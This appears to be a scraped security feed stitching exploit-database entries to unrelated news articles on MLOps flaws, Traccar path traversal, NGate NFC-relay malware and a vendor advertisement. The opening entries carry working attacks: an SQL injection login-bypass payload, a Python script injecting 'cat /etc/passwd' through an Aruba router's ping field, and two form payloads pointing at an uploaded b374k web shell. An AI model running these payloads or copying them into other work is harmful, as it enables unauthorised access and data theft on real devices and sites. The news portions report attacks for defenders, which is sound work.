DETS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : DETS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/dets/add-expense.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

DETS Project 1.0 SQL Injection

Aruba 501 version CN12G5W0XX suffers from a remote command execution vulnerability.

    # Exploit Title: Remote Command Execution | Aurba 501# Date: 17-07-2024# Exploit Author: Hosein Vita# Vendor Homepage: https://www.hpe.com# Version: Aurba 501 CN12G5W0XX# Tested on: Linuximport requestsfrom requests.auth import HTTPBasicAuthdef get_input(prompt, default_value):    user_input = input(prompt)    return user_input if user_input else default_valuebase_url = input("Enter the base URL: ")if not base_url:    print("Base URL is required.")    exit(1)username = get_input("Enter the username (default: admin): ", "admin")password = get_input("Enter the password (default: admin): ", "admin")login_url = f"{base_url}/login.cgi"login_payload = {    "username": username,    "password": password,    "login": "Login"}login_headers = {    "Accept-Encoding": "gzip, deflate, br",    "Content-Type": "application/x-www-form-urlencoded",    "Origin": base_url,    "Connection": "close"}session = requests.Session()requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)# Login to the systemresponse = session.post(login_url, headers=login_headers, data=login_payload, verify=False)# Check if login was successfulif response.status_code == 200 and "login failed" not in response.text.lower():    print("Login successful!")        # The command to be executed on the device    command = "cat /etc/passwd"            ping_ip = f"4.2.2.4||{command}"        # Data to be sent in the POST request    data = {        "ping_ip": ping_ip,        "ping_timeout": "1",        "textareai": "",        "ping_start": "Ping"    }        # Headers to be sent with the request    headers = {        "Accept-Encoding": "gzip, deflate, br",        "Content-Type": "application/x-www-form-urlencoded",        "Origin": base_url,        "Referer": f"{base_url}/admin.cgi?action=ping",        "Connection": "close"    }        # Sending the HTTP POST request to exploit the vulnerability    exploit_url = f"{base_url}/admin.cgi?action=ping"    response = session.post(exploit_url, headers=headers, data=data, verify=False)            if any("root" in value for value in response.headers.values()):        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")        print(response.headers)    else:        print("Exploit failed. The response headers did not contain the expected output.")else:    print("Login failed. Please check the credentials and try again.")# Print the response headers for further analysisprint(response.headers)

Aruba 501 CN12G5W0XX Remote Command Execution

Bang Resto version 1.0 suffers from an information disclosure vulnerability.

====================================================================================================================================  
| # Title     : Bang Resto 1.0 HTML Form in redirect page Vulnerability                                                            |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   |  
| # Vendor    : https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip                                                |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/Bang/admin  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/Bang/admin  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Bang Resto 1.0 Information Disclosure

School Log Management System version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

School Log Management System 1.0 SQL Injection / Code Execution

Simple College Website version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about_us"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Simple College Website 1.0 SQL Injection / Code Execution

Cybersecurity researchers are warning about the security risks in the machine learning (ML) software supply chain following the discovery of more than 20 vulnerabilities that could be exploited to target MLOps platforms.
These vulnerabilities, which are described as inherent- and implementation-based flaws, could have severe consequences, ranging from arbitrary code execution to loading

Cybersecurity researchers are warning about the security risks in the machine learning (ML) software supply chain following the discovery of more than 20 vulnerabilities that could be exploited to target MLOps platforms.

These vulnerabilities, which are described as inherent- and implementation-based flaws, could have severe consequences, ranging from arbitrary code execution to loading malicious datasets.

MLOps platforms offer the ability to design and execute an ML model pipeline, with a model registry acting as a repository used to store and version-trained ML models. These models can then be embedded within an application or allow other clients to query them using an API (aka model-as-a-service).

"Inherent vulnerabilities are vulnerabilities that are caused by the underlying formats and processes used in the target technology," JFrog researchers said in a detailed report.

Some examples of inherent vulnerabilities include abusing ML models to run code of the attacker's choice by taking advantage of the fact that models support automatic code execution upon loading (e.g., Pickle model files).

This behavior also extends to certain dataset formats and libraries, which allow for automatic code execution, thereby potentially opening the door to malware attacks when simply loading a publicly-available dataset.

Another instance of inherent vulnerability concerns JupyterLab (formerly Jupyter Notebook), a web-based interactive computational environment that enables users to execute blocks (or cells) of code and view the corresponding results.

"An inherent issue that many do not know about, is the handling of HTML output when running code blocks in Jupyter," the researchers pointed out. "The output of your Python code may emit HTML and \[JavaScript\] which will be happily rendered by your browser."

The problem here is that the JavaScript result, when run, is not sandboxed from the parent web application and that the parent web application can automatically run arbitrary Python code.

In other words, an attacker could output a malicious JavaScript code such that it adds a new cell in the current JupyterLab notebook, injects Python code into it, and then executes it. This is particularly true in cases when exploiting a cross-site scripting (XSS) vulnerability.

To that end, JFrog said it identified an XSS flaw in MLFlow (CVE-2024-27132, CVSS score: 7.5) that stems from a lack of sufficient sanitization when running an untrusted recipe, resulting in client-side code execution in JupyterLab.

"One of our main takeaways from this research is that we need to treat all XSS vulnerabilities in ML libraries as potential arbitrary code execution, since data scientists may use these ML libraries with Jupyter Notebook," the researchers said.

The second set of flaws relate to implementation weaknesses, such as lack of authentication in MLOps platforms, potentially permitting a threat actor with network access to obtain code execution capabilities by abusing the ML Pipeline feature.

These threats aren't theoretical, with financially motivated adversaries abusing such loopholes, as observed in the case of unpatched Anyscale Ray (CVE-2023-48022, CVSS score: 9.8), to deploy cryptocurrency miners.

A second type of implementation vulnerability is a container escape targeting Seldon Core that enables attackers to go beyond code execution to move laterally across the cloud environment and access other users' models and datasets by uploading a malicious model to the inference server.

The net outcome of chaining these vulnerabilities is that they could not only be weaponized to infiltrate and spread inside an organization, but also compromise servers.

"If you're deploying a platform that allows for model serving, you should now know that anybody that can serve a new model can also actually run arbitrary code on that server," the researchers said. "Make sure that the environment that runs the model is completely isolated and hardened against a container escape."

The disclosure comes as Palo Alto Networks Unit 42 detailed two now-patched vulnerabilities in the open-source LangChain generative AI framework (CVE-2023-46229 and CVE-2023-44467) that could have allowed attackers to execute arbitrary code and access sensitive data, respectively.

Last month, Trail of Bits also revealed four issues in Ask Astro, a retrieval augmented generation (RAG) open-source chatbot application, that could lead to chatbot output poisoning, inaccurate document ingestion, and potential denial-of-service (DoS).

Just as security issues are being exposed in artificial intelligence-powered applications, techniques are also being devised to poison training datasets with the ultimate goal of tricking large language models (LLMs) into producing vulnerable code.

"Unlike recent attacks that embed malicious payloads in detectable or irrelevant sections of the code (e.g., comments), CodeBreaker leverages LLMs (e.g., GPT-4) for sophisticated payload transformation (without affecting functionalities), ensuring that both the poisoned data for fine-tuning and generated code can evade strong vulnerability detection," a group of academics from the University of Connecticut said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Identify Over 20 Supply Chain Vulnerabilities in MLOps Platforms

Nowadays, sensitive and critical data is traveling in everyday business channels that offer only the basic level of security and encryption, and companies are often oblivious to the risk. A case in point: Disney suffered a devastating data leak by a hacktivist group known as NullBulge that got hold of over 1.2 terabytes of data from Disney's internal Slack messaging channels. The breach exposed

Nowadays, sensitive and critical data is traveling in everyday business channels that offer only the basic level of security and encryption, and companies are often oblivious to the risk. A case in point: Disney suffered a devastating data leak by a hacktivist group known as NullBulge that got hold of over 1.2 terabytes of data from Disney's internal Slack messaging channels. The breach exposed sensitive information, including:

*   details about unreleased projects,
*   computer code,
*   login details and passwords, and
*   Intellectual Property (IP) and corporate secrets.

Slack breaches have also impacted companies like Uber, Rockstar, and Electronic Arts (EA). Cisco Webex used by the German Bundeswehr leaked data from hundreds of meetings, some classified. Outlook was breached by Chinese hackers last year.

We have nothing against any of the tools above. They are all great collaboration tools. However, just like companies don't allow developers to use just any old tool to push code to production (hint, they often use privileged access management), they should not allow the use of unauthorized channels for sensitive and business-critical communications that involve restricted, confidential, or secret data. This is why we at SSH Communications Security have built a solution portfolio to address the need.

Let's go through the six ways our solution can secure sensitive communications.

****Introducing SalaX Secure Collaboration 2024 for sensitive communications********1\. Authorized for sharing sensitive data****

Ever since inventing the Secure Shell (SSH) protocol, the company namesake, we at SSH have been obsessed with security. We are an ISO/IEC 27001:2022 certified company. Our SalaX Secure Collaboration 2024 portfolio includes products that have achieved the TL III security classification (EU confidential) by the NCSA function of Traficom, the official approver of cryptographic products in Finland.

This is why SalaX Secure Collaboration 2024 is trusted by authorities, government bodies, banks, and law firms alike.

****2\. Default security setting: high****

While tools like Slack and Teams are great for everyday business discussions, they were not built with a security-first mindset. There are ways to ramp up the security features of both solutions, but they either cost more or require extra configurations to work. What you need is a solution that has end-to-end encryption built-in, ensuring the messages are not decrypted at any point along the way. Senders and recipients can be verified using various strong authentication methods. Even we as the vendor cannot see any correspondence taking place via your authorized channels.

****3\. Meet data sovereignty requirements with flexible deployment options****

Most online collaboration tools are only available as a service, hosted on someone else's cloud. SalaX Secure Collaboration 2024 gives you the flexibility to host it in the public cloud, private cloud, or on-premises (or any combination in between) so that you have full control over your secure communication channels and can fully own your sensitive data if needed. You can ensure that your communications don't leave any trace on the public internet.

****4\. Our secret handshake: let's exchange encryption keys!****

How can you make online collaboration super secure? By ensuring that you and your co-communicators exchange your very private encryption keys before the communication even starts! Technically, it all happens under the hood, so it's easy for the user, but you do not start a conversation with anyone before you accept to receive communications from them with our solution. After that, the conversation is just between the people in the group chat or the chat room. Except…

****5\. Fulfill record-keeping and auditing requirements****

…when you need an audit trail. Over the past 2-3 years, the Securities and Exchange Commission (SEC) has fined multiple US investor companies for failing to fulfill record-keeping requirements. The companies were guilty of sending and receiving off-channel communications using tools like WhatsApp and Signal. These tools do not produce an adequate and tamper-proof audit trail of activities like our SalaX Secure Collaboration 2024 does. Enforcing record-keeping policies is a must.

****6\. Based on battle-tested technology****

Just like the Secure Shell protocol became the de facto standard in human-to-server and server-to-server communications, we chose a technology that is widely used and trusted by authorities and heavily regulated industries all over the world: Element. Solutions like Slack integrate with it for a good reason.

SalaX Secure Collaboration 2024 is built on the Element technology, allowing your business to join a network of organizations that are using a platform that is widely available for secure communications.

****SalaX Secure Collaboration 2024: Messaging, video/audio calls, rooms, and emails in a single platform****

SalaX Secure Collaboration 2024 is a comprehensive and super-secure collaboration platform for the most common business-critical and sensitive communication instances. The solution makes it easy to encrypt emails, messages, chat rooms, and audio/video communications for privacy, compliance, and record-keeping purposes.

Some great features not mentioned in the article include:

*   Send attachments in chats or emails with up to 1GB data
*   Receive inbound messages directly from a website and verified users only
*   Choose from various authentication methods, including MFA, OTP, PIN, SSO, and bank IDs
*   Flexible permissions control
*   Integration with tools like Jira, HubSpot, or GitLab to protect project discussions of sensitive nature

Learn more about SalaX Secure Collaboration 2024 here!

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Unpacking Slack Hacks: 6 Ways to Protect Sensitive Data with Secure Collaboration

Two security vulnerabilities have been disclosed in the open-source Traccar GPS tracking system that could be potentially exploited by unauthenticated attackers to achieve remote code execution under certain circumstances.
Both the vulnerabilities are path traversal flaws and could be weaponized if guest registration is enabled, which is the default configuration for Traccar 5, Horizon3.ai

Software Security / Vulnerability

Two security vulnerabilities have been disclosed in the open-source Traccar GPS tracking system that could be potentially exploited by unauthenticated attackers to achieve remote code execution under certain circumstances.

Both the vulnerabilities are path traversal flaws and could be weaponized if guest registration is enabled, which is the default configuration for Traccar 5, Horizon3.ai researcher Naveen Sunkavally said.

A brief description of the shortcomings is as follows -

*   **CVE-2024-24809** (CVSS score: 8.5) - Path Traversal: 'dir/../../filename' and unrestricted upload of file with dangerous type
*   **CVE-2024-31214** (CVSS score: 9.7) - Unrestricted file upload vulnerability in device image upload could lead to remote code execution

"The net result of CVE-2024-31214 and CVE-2024-24809 is that an attacker can place files with arbitrary content anywhere on the file system," Sunkavally said. "However an attacker only has partial control over the filename."

The issues have to do with how the program handles device image file uploads, effectively allowing an attacker to overwrite certain files on the file system and trigger code execution. This includes files matching the below naming format -

*   device.ext, where the attacker can control ext, but there MUST be an extension
*   blah", where the attacker can control blah but the filename must end with a double quote
*   blah1";blah2=blah3, where the attacker can control blah1, blah2, and blah3, but the double quote semicolon sequence and equals symbol MUST be present

In a hypothetical proof-of-concept (PoC) devised by Horizon3.ai, an adversary can exploit the path traversal in the Content-Type header to upload a crontab file and obtain a reverse shell on the attacker host.

This attack method, however, does not work on Debian/Ubuntu-based Linux systems due to file naming restrictions that bar crontab files from having periods or double quotes.

An alternative mechanism entails taking advantage of Traccar being installed as a root-level user to drop a kernel module or configuring an udev rule to run an arbitrary command every time a hardware event is raised.

On susceptible Windows instances, remote code execution could also be achieved by placing a shortcut (LNK) file named "device.lnk" in the C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp folder, which gets subsequently executed when any victim user logs into the Traccar host.

Traccar versions 5.1 to 5.12 are vulnerable to CVE-2024-31214 and CVE-2024-2809. The issues have been addressed with the release of Traccar 6 in April 2024 which turns off self-registration by default, thereby reducing the attack surface.

"If the registration setting is true, readOnly is false, and deviceReadonly is false, then an unauthenticated attacker can exploit these vulnerabilities," Sunkavally said. "These are the default settings for Traccar 5."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Flaws in Traccar GPS System Expose Users to Remote Attacks

Cybersecurity researchers have uncovered new Android malware that can relay victims' contactless payment data from physical credit and debit cards to an attacker-controlled device with the goal of conducting fraudulent operations.
The Slovak cybersecurity company is tracking the novel malware as NGate, stating it observed the crimeware campaign targeting three banks in Czechia.
The malware "has

Financial Fraud / Mobile Security

Cybersecurity researchers have uncovered new Android malware that can relay victims' contactless payment data from physical credit and debit cards to an attacker-controlled device with the goal of conducting fraudulent operations.

The Slovak cybersecurity company is tracking the novel malware as NGate, stating it observed the crimeware campaign targeting three banks in Czechia.

The malware "has the unique ability to relay data from victims' payment cards, via a malicious app installed on their Android devices, to the attacker's rooted Android phone," researchers Lukáš Štefanko and Jakub Osmani said in an analysis.

The activity is part of a broader campaign that has been found to target financial institutions in Czechia since November 2023 using malicious progressive web apps (PWAs) and WebAPKs. The first recorded use of NGate was in March 2024.

The end goal of the attacks is to clone near-field communication (NFC) data from victims' physical payment cards using NGate and transmit the information to an attacker device that then emulates the original card to withdraw money from an ATM.

NGate has its roots in a legitimate tool named NFCGate, which was originally developed in 2015 for security research purposes by students of the Secure Mobile Networking Lab at TU Darmstadt.

The attack chains are believed to involve a combination of social engineering and SMS phishing to trick users into installing NGate by directing users to short-lived domains impersonating legitimate banking websites or official mobile banking apps available on the Google Play store.

As many as six different NGate apps have been identified to date between November 2023 and March 2024, when the activities came to a halt likely following the arrest of a 22-year-old by Czech authorities in connection with stealing funds from ATMs.

NGate, besides abusing the functionality of NFCGate to capture NFC traffic and pass it along to another device, prompts users to enter sensitive financial information, including banking client ID, date of birth, and the PIN code for their banking card. The phishing page is presented within a WebView.

"It also asks them to turn on the NFC feature on their smartphone," the researchers said. "Then, victims are instructed to place their payment card at the back of their smartphone until the malicious app recognizes the card."

The attacks further adopt an insidious approach in that victims, after having installed the PWA or WebAPK app through links sent via SMS messages, have their credentials phished and subsequently receive calls from the threat actor, who pretends to be a bank employee and informs them that their bank account had been compromised as a result of installing the app.

They are subsequently instructed to change their PIN and validate their banking card using a different mobile app (i.e., NGate), an installation link to which is also sent through SMS. There is no evidence that these apps were distributed through the Google Play Store.

"NGate uses two distinct servers to facilitate its operations," the researchers explained. "The first is a phishing website designed to lure victims into providing sensitive information and capable of initiating an NFC relay attack. The second is an NFCGate relay server tasked with redirecting NFC traffic from the victim's device to the attacker's."

The disclosure comes as Zscaler ThreatLabz detailed a new variant of a known Android banking trojan called Copybara that's propagated via voice phishing (vishing) attacks and lures them into entering their bank account credentials.

"This new variant of Copybara has been active since November 2023, and utilizes the MQTT protocol to establish communication with its command-and-control (C2) server," Ruchna Nigam said.

"The malware abuses the accessibility service feature that is native to Android devices to exert granular control over the infected device. In the background, the malware also proceeds to download phishing pages that imitate popular cryptocurrency exchanges and financial institutions with the use of their logos and application names."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Android Malware NGate Steals NFC Data to Clone Contactless Payment Cards

Durov has reportedly been detained in France over Telegram’s alleged failure to adequately moderate illegal content on the messaging app. His arrest sparked backlash and left some associates asking, what now?

